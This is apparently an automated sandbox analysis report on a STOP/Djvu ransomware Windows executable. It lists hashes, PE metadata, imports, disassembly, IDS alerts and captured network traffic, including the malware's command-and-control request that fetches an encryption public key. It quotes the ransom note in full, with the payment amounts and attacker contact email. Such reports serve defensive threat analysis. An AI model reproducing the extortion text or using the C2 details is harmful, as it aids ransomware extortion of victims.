                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWyJmFRqrl3W4kA+GT/kF5M2/k1QX6RKTJe4:WZHfv0p6WyJPFWrDGT0f/kaXZx
                                                                                  MD5:06659F4E86D452FDFC033CA033D99967
                                                                                  SHA1:688415EAA260FC4EFFAB85299205BDAF560FBE9D
                                                                                  SHA-256:A4D9B2453B597D31DD620E5249E801C0ADEF69925C193411FBEDAE35C2294AC2
                                                                                  SHA-512:482C5CF017BD71AFC7B1570B0158F84F9B12F6D86F82B528C43AA1D7AB22F7AFBFC3E93FC700FAE34300B6CD09F42E2ED6354C4DD9977259A0A93225910E2421
                                                                                  Malicious:false
                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-QsoSRIeAK6..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@bestyourmail.ch....Reserve e-mail addres
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1116
                                                                                  Entropy (8bit):4.862226211132582
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuWyJmFRqrl3W4kA+GT/kF5M2/k1QX6RKTJe4:WZHfv0p6WyJPFWrDGT0f/kaXZx
                                                                                  MD5:06659F4E86D452FDFC033CA033D99967
                                                                                  SHA1:688415EAA260FC4EFFAB85299205BDAF560FBE9D
                                                                                  SHA-256:A4D9B2453B597D31DD620E5249E801C0ADEF69925C193411FBEDAE35C2294AC2
                                                                                  SHA-512:482C5CF017BD71AFC7B1570B0158F84F9B12F6D86F82B528C43AA1D7AB22F7AFBFC3E93FC700FAE34300B6CD09F42E2ED6354C4DD9977259A0A93225910E2421
                                                                                  Malicious:true
                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-QsoSRIeAK6..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@bestyourmail.ch....Reserve e-mail addres
                                                                                  Process:C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):414
                                                                                  Entropy (8bit):7.320599052207444
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:VhatxK3GN32CvWEbYu/IGvsiT5Kbkscii9a:+e3k2CvWE//FvsilKwsbD
                                                                                  MD5:DE939E7C4676D837DADCA74CBF6DAF36
                                                                                  SHA1:A7C2E9E7C087823FDD3084265C21566C48910946
                                                                                  SHA-256:11AE8744555A18E38B54522EEFF1A024A90DAC9A29D2D800699D99F1F7CEA5A4
                                                                                  SHA-512:BC1F99EF89710195316127A650E3DA3A0A67E30A13E8EA888482A95B26393A8705839BFFB88B7294E43831AA2C3BCFD4FAE0041939978BB2AADC0B10C54396BD
                                                                                  Malicious:false
                                                                                  Preview:P.....|......m.A().....Q3~%..:.o..!..3W.....,R.*H`..C.k..O.7...G..Ex..3..G...7.d.S/...>.....o.^.A...F.....5{..n.l.m.s.7z..."/.S...p.a.D..hZw..q$...n..4v....:...I.].h..t.x.m3jf..6.K.".D...ri...S._.e\..W#x...Q.k..+41~.:.._@.&..nI0.]'..O....4....vr.O..h...h..?X.u}.P..`...2}z.{.....r5.6......4)..{T.,.e|.B...._.......t.$Q.=0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Entropy (8bit):7.842662742823055
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                  File name:bE5aaTiJM0.exe
                                                                                  File size:747520
                                                                                  MD5:5fae11a9ddb49452b6896fd3217e9665
                                                                                  SHA1:a642378099d0ac4e1dc3e0abe98b12bee1992e1d
                                                                                  SHA256:12471d61dc844208bdbe23a9749980cf1a40ad45f844449afe55fb0f1cbbda0b
                                                                                  SHA512:8244571ab072b89fe10c6c8a78b0f3b62c6833054d40b327c51583cc247d1e13f8dbf4e8367ce3672a5c5c14de8b53fcc7969bb6d78f4232ebebe77d460768ac
                                                                                  SSDEEP:12288:nCqmkJm0QpmFRBBAw356C94EnhtoLWBEmlCW85h1bmyA5qKyr3ty+SqOhUII84ko:n410QpmfBB5UEnhtjroWW/Hro+TICktO
                                                                                  TLSH:C2F41230B680E433D06791309564CFAD1B7EB912163189C7B7A42B3E6E763C26B25B5F
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ADS. *.. *.. *..V... *..V... *..X... *.. +.` *..V... *..V... *..V... *.Rich. *.........................PE..L..."V.`...........
                                                                                  Icon Hash:8a9199a9ca8ed2f2
                                                                                  Entrypoint:0x498440
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                  Time Stamp:0x609B5622 [Wed May 12 04:14:26 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:
                                                                                  OS Version Major:5
                                                                                  OS Version Minor:1
                                                                                  File Version Major:5
                                                                                  File Version Minor:1
                                                                                  Subsystem Version Major:5
                                                                                  Subsystem Version Minor:1
                                                                                  Import Hash:fcbdb87c73dba6603c8b6aba49ea683b
                                                                                  Instruction
                                                                                  call 00007FF04CA8DB4Bh
                                                                                  jmp 00007FF04CA8717Eh
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  call 00007FF04CA8732Ch
                                                                                  xchg cl, ch
                                                                                  jmp 00007FF04CA87314h
                                                                                  call 00007FF04CA87323h
                                                                                  fxch st(0), st(1)
                                                                                  jmp 00007FF04CA8730Bh
                                                                                  fabs
                                                                                  fld1
                                                                                  mov ch, cl
                                                                                  xor cl, cl
                                                                                  jmp 00007FF04CA87301h
                                                                                  mov byte ptr [ebp-00000090h], FFFFFFFEh
                                                                                  fabs
                                                                                  fxch st(0), st(1)
                                                                                  fabs
                                                                                  fxch st(0), st(1)
                                                                                  fpatan
                                                                                  or cl, cl
                                                                                  je 00007FF04CA872F6h
                                                                                  fldpi
                                                                                  fsubrp st(1), st(0)
                                                                                  or ch, ch
                                                                                  je 00007FF04CA872F4h
                                                                                  fchs
                                                                                  ret
                                                                                  fabs
                                                                                  fld st(0), st(0)
                                                                                  fld st(0), st(0)
                                                                                  fld1
                                                                                  fsubrp st(1), st(0)
                                                                                  fxch st(0), st(1)
                                                                                  fld1
                                                                                  faddp st(1), st(0)
                                                                                  fmulp st(1), st(0)
                                                                                  ftst
                                                                                  wait
                                                                                  fstsw word ptr [ebp-000000A0h]
                                                                                  wait
                                                                                  test byte ptr [ebp-0000009Fh], 00000001h
                                                                                  jne 00007FF04CA872F7h
                                                                                  xor ch, ch
                                                                                  fsqrt
                                                                                  ret
                                                                                  pop eax
                                                                                  jmp 00007FF04CA8DD1Fh
                                                                                  fstp st(0)
                                                                                  fld tbyte ptr [004024AAh]
                                                                                  ret
                                                                                  fstp st(0)
                                                                                  or cl, cl
                                                                                  je 00007FF04CA872FDh
                                                                                  fstp st(0)
                                                                                  fldpi
                                                                                  or ch, ch
                                                                                  je 00007FF04CA872F4h
                                                                                  fchs
                                                                                  ret
                                                                                  fstp st(0)
                                                                                  fldz
                                                                                  or ch, ch
                                                                                  je 00007FF04CA872E9h
                                                                                  fchs
                                                                                  ret
                                                                                  fstp st(0)
                                                                                  jmp 00007FF04CA8DCF5h
                                                                                  fstp st(0)
                                                                                  mov cl, ch
                                                                                  jmp 00007FF04CA872F2h
                                                                                  call 00007FF04CA872BEh
                                                                                  jmp 00007FF04CA8DD00h
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  int3
                                                                                  push ebp
                                                                                  mov ebp, esp
                                                                                  add esp, 00FFFD30h
                                                                                  Programming Language:
                                                                                  • [ASM] VS2010 build 30319
                                                                                  • [ C ] VS2010 build 30319
                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                  • [C++] VS2010 build 30319
                                                                                  • [RES] VS2010 build 30319
                                                                                  • [LNK] VS2010 build 30319
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa627c | 0x3c | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x212e000 | 0xd568 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x1220 | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x3660 | 0x40 | .text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x1d8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0xa5d5e | 0xa5e00 | False | 0.9465576723813113 | data | 7.947102009414188 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data | 0xa7000 | 0x20861cc | 0x3000 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x212e000 | 0xd568 | 0xd600 | False | 0.663898218457944 | data | 6.505740612537396 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country
RT_ICON | 0x212e4e0 | 0xea8 | data | Kannada | Kanada
RT_ICON | 0x212f388 | 0x8a8 | data | Kannada | Kanada
RT_ICON | 0x212fc30 | 0x568 | GLS_BINARY_LSB_FIRST | Kannada | Kanada
RT_ICON | 0x2130198 | 0x25a8 | data | Kannada | Kanada
RT_ICON | 0x2132740 | 0x10a8 | data | Kannada | Kanada
RT_ICON | 0x21337e8 | 0x988 | data | Kannada | Kanada
RT_ICON | 0x2134170 | 0x468 | GLS_BINARY_LSB_FIRST | Kannada | Kanada
RT_ICON | 0x2134640 | 0xea8 | data | Kannada | Kanada
RT_ICON | 0x21354e8 | 0x8a8 | data | Kannada | Kanada
RT_ICON | 0x2135d90 | 0x6c8 | data | Kannada | Kanada
RT_ICON | 0x2136458 | 0x568 | GLS_BINARY_LSB_FIRST | Kannada | Kanada
RT_ICON | 0x21369c0 | 0x25a8 | data | Kannada | Kanada
RT_ICON | 0x2138f68 | 0x10a8 | data | Kannada | Kanada
RT_ICON | 0x213a010 | 0x468 | GLS_BINARY_LSB_FIRST | Kannada | Kanada
RT_DIALOG | 0x213a688 | 0x78 | data | |
RT_STRING | 0x213a700 | 0x67a | data | French | Switzerland
RT_STRING | 0x213ad80 | 0x464 | data | French | Switzerland
RT_STRING | 0x213b1e8 | 0x37c | data | French | Switzerland
RT_GROUP_ICON | 0x21345d8 | 0x68 | data | Kannada | Kanada
RT_GROUP_ICON | 0x213a478 | 0x68 | data | Kannada | Kanada
RT_VERSION | 0x213a4f0 | 0x194 | data | |
None | 0x213a4e0 | 0xa | data | |
DLL | Import
KERNEL32.dll | GetModuleFileNameA, FoldStringA, GetLocalTime, InterlockedDecrement, GetLocaleInfoA, InterlockedCompareExchange, _hwrite, CancelWaitableTimer, GetSystemDirectoryW, CreateEventW, ReadConsoleA, BuildCommDCBA, GetConsoleAliasExesLengthW, SetSystemTimeAdjustment, PeekConsoleInputW, EnumDateFormatsA, CreateFileW, RegisterWaitForSingleObjectEx, LoadLibraryW, VerifyVersionInfoW, WaitNamedPipeA, GetEnvironmentStrings, FindResourceExA, VirtualProtect, GetFirmwareEnvironmentVariableW, BeginUpdateResourceW, WriteConsoleA, EnumCalendarInfoExA, WriteConsoleW, DeleteFileW, FillConsoleOutputCharacterA, GetProcAddress, GetModuleHandleW, GetUserDefaultLCID, FindFirstChangeNotificationA, GetFileAttributesExA, GetCalendarInfoA, SetConsoleTitleA, GetBinaryTypeW, GlobalAlloc, GetComputerNameExA, FindNextFileA, OpenJobObjectA, HeapSize, _lclose, GetComputerNameW, TlsGetValue, SetCalendarInfoW, SetComputerNameA, CreateDirectoryExA, InitializeCriticalSectionAndSpinCount, GetVolumePathNameA, GetProcessHandleCount, GetThreadLocale, GetSystemDefaultLangID, GetCurrentProcess, LoadLibraryA, ReadFile, HeapFree, GetDiskFreeSpaceW, GetProcessHeap, RaiseException, RtlUnwind, MultiByteToWideChar, GetCommandLineW, HeapSetInformation, GetStartupInfoW, EncodePointer, HeapAlloc, GetLastError, IsProcessorFeaturePresent, DecodePointer, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, SetLastError, GetCurrentThreadId, SetHandleCount, GetStdHandle, GetFileType, DeleteCriticalSection, SetFilePointer, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, TerminateProcess, EnterCriticalSection, LeaveCriticalSection, ExitProcess, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, CloseHandle, WriteFile, GetModuleFileNameW, FreeEnvironmentStringsW, GetEnvironmentStringsW, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, Sleep, SetStdHandle, WideCharToMultiByte, GetConsoleCP, GetConsoleMode, FlushFileBuffers, CreateFileA, LCMapStringW, GetStringTypeW, HeapReAlloc, SetEndOfFile
USER32.dll | ClientToScreen
Language of compilation system | Country where language is spoken | Map
Kannada | Kanada |
French | Switzerland |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
08/05/22-11:22:58.893846 | TCP | 2833438 | ETPRO TROJAN STOP Ransomware CnC Activity | 49782 | 80 | 192.168.2.6 | 58.235.189.192
08/05/22-11:22:59.718335 | TCP | 2036335 | ET TROJAN Win32/Filecoder.STOP Variant Public Key Download | 80 | 49782 | 58.235.189.192 | 192.168.2.6
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Aug 5, 2022 11:22:24.625781059 CEST | 192.168.2.6 | 8.8.8.8 | 0x8137 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Aug 5, 2022 11:22:40.024580002 CEST | 192.168.2.6 | 8.8.8.8 | 0x6c68 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Aug 5, 2022 11:22:49.905822039 CEST | 192.168.2.6 | 8.8.8.8 | 0xdc30 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Aug 5, 2022 11:22:57.003020048 CEST | 192.168.2.6 | 8.8.8.8 | 0xc534 | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Aug 5, 2022 11:22:57.935260057 CEST | 192.168.2.6 | 8.8.8.8 | 0xc62c | Standard query (0) | api.2ip.ua | A (IP address) | IN (0x0001)
Aug 5, 2022 11:22:58.320210934 CEST | 192.168.2.6 | 8.8.8.8 | 0x156b | Standard query (0) | acacaca.org | A (IP address) | IN (0x0001)
                                                                                  Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                                  Aug 5, 2022 11:22:24.648847103 CEST | 8.8.8.8 | 192.168.2.6 | 0x8137 | No error (0) | api.2ip.ua |  | 162.0.217.254 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:40.047831059 CEST | 8.8.8.8 | 192.168.2.6 | 0x6c68 | No error (0) | api.2ip.ua |  | 162.0.217.254 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:49.928405046 CEST | 8.8.8.8 | 192.168.2.6 | 0xdc30 | No error (0) | api.2ip.ua |  | 162.0.217.254 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:57.026122093 CEST | 8.8.8.8 | 192.168.2.6 | 0xc534 | No error (0) | api.2ip.ua |  | 162.0.217.254 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:57.954525948 CEST | 8.8.8.8 | 192.168.2.6 | 0xc62c | No error (0) | api.2ip.ua |  | 162.0.217.254 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 58.235.189.192 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 138.36.3.134 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 190.107.133.19 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 190.140.74.43 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 190.219.54.242 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 211.119.84.111 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 222.236.49.123 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 190.140.99.150 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 211.53.230.67 | A (IP address) | IN (0x0001)
                                                                                  Aug 5, 2022 11:22:58.592458963 CEST | 8.8.8.8 | 192.168.2.6 | 0x156b | No error (0) | acacaca.org |  | 110.14.121.125 | A (IP address) | IN (0x0001)
                                                                                  • api.2ip.ua
                                                                                  • acacaca.org
                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  5 | 192.168.2.6 | 49782 | 58.235.189.192 | 80 | C:\Users\user\AppData\Local\134b591f-abb9-4ef9-932a-7c7a6a2cddfe\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  Aug 5, 2022 11:22:58.893846035 CEST | 1226 | OUT | GET /test2/get.php?pid=63423FF445583FE5A9A41B7CFEC3D9C4 HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: acacaca.org
                                                                                  Aug 5, 2022 11:22:59.718334913 CEST | 1227 | IN | HTTP/1.1 200 OK
                                                                                  Date: Fri, 05 Aug 2022 09:22:59 GMT
                                                                                  Server: Apache/2.4.37 (Win64) PHP/5.6.40
                                                                                  X-Powered-By: PHP/5.6.40
                                                                                  Content-Length: 561
                                                                                  Connection: close
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: {"public_key":"-----BEGIN&#160;PUBLIC&#160;KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0WwY79IFZHZrRTX+vM3Y\\n8vLG5Fnx04RdRkdPzflUpeIp+QciBK3E+9VTqWRNYgX7ZXz1zQ1a8RYyZS57f+G7\\no5ou33dQpTxjxaokVKMxSGDR7G7t2F+PjWGtcHWfu\/QEkGHsncNheEAky6zLik2o\\nM1lYi33LUE8aALATOcdYB5QhLJd1ScsJ3c4\/uYr4EpaMSkIiyi\/PSyExYcKuB9cG\\ncc+8IPQv3D\/OjBHprAVJz1i+hPzn24maQ77r60n49y\/S3kPh58U7BRGaqwoCj+TZ\\nvVl+uzb++io3bEdL+ynNOPPz+\/FKvSWzNUR+uR+jQrJ36dhsqnTsto\/RELO4Rj5h\\nKQIDAQAB\\n-----END&#160;PUBLIC&#160;KEY-----\\n","id":"0kP6vOoEdBm9p2ITHS3ppg85iRBRKnEdtqfNfpPA"}


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  0 | 192.168.2.6 | 49766 | 162.0.217.254 | 443 | C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 09:22:25 UTC | 0 | OUT | GET /geo.json HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: api.2ip.ua
                                                                                  2022-08-05 09:22:25 UTC | 0 | IN | HTTP/1.1 429 Too Many Requests
                                                                                  Date: Fri, 05 Aug 2022 09:22:25 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  1 | 192.168.2.6 | 49767 | 162.0.217.254 | 443 | C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 09:22:40 UTC | 1 | OUT | GET /geo.json HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: api.2ip.ua
                                                                                  2022-08-05 09:22:40 UTC | 1 | IN | HTTP/1.1 429 Too Many Requests
                                                                                  Date: Fri, 05 Aug 2022 09:22:40 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  2 | 192.168.2.6 | 49768 | 162.0.217.254 | 443 | C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 09:22:51 UTC | 2 | OUT | GET /geo.json HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: api.2ip.ua
                                                                                  2022-08-05 09:22:51 UTC | 2 | IN | HTTP/1.1 429 Too Many Requests
                                                                                  Date: Fri, 05 Aug 2022 09:22:51 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  3 | 192.168.2.6 | 49780 | 162.0.217.254 | 443 | C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 09:22:57 UTC | 3 | OUT | GET /geo.json HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: api.2ip.ua
                                                                                  2022-08-05 09:22:57 UTC | 3 | IN | HTTP/1.1 429 Too Many Requests
                                                                                  Date: Fri, 05 Aug 2022 09:22:57 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>


                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                  4 | 192.168.2.6 | 49781 | 162.0.217.254 | 443 | C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                  2022-08-05 09:22:58 UTC | 4 | OUT | GET /geo.json HTTP/1.1
                                                                                  User-Agent: Microsoft Internet Explorer
                                                                                  Host: api.2ip.ua
                                                                                  2022-08-05 09:22:58 UTC | 4 | IN | HTTP/1.1 429 Too Many Requests
                                                                                  Date: Fri, 05 Aug 2022 09:22:58 GMT
                                                                                  Server: Apache
                                                                                  Strict-Transport-Security: max-age=63072000; preload
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  X-XSS-Protection: 1; mode=block; report=...
                                                                                  Access-Control-Allow-Origin: *
                                                                                  Access-Control-Allow-Methods: POST, GET, PUT, OPTIONS, PATCH, DELETE
                                                                                  Access-Control-Allow-Headers: X-Accept-Charset,X-Accept,Content-Type
                                                                                  Upgrade: h2,h2c
                                                                                  Connection: Upgrade, close
                                                                                  Transfer-Encoding: chunked
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Data Ascii: 22a<link rel="stylesheet" href="classes/style.css" type="text/css" /><div class="error">Limit of returned objects has been reached. For more information please contact by email <a href="mailto:help@2ip.me?subject=2ip.me">help@2ip.me</a>. <br><br>



                                                                                  Target ID:0
                                                                                  Start time:11:22:15
                                                                                  Start date:05/08/2022
                                                                                  Path:C:\Users\user\Desktop\bE5aaTiJM0.exe
                                                                                  Wow64 process (32bit):true
                                                                                  Commandline:"C:\Users\user\Desktop\bE5aaTiJM0.exe"
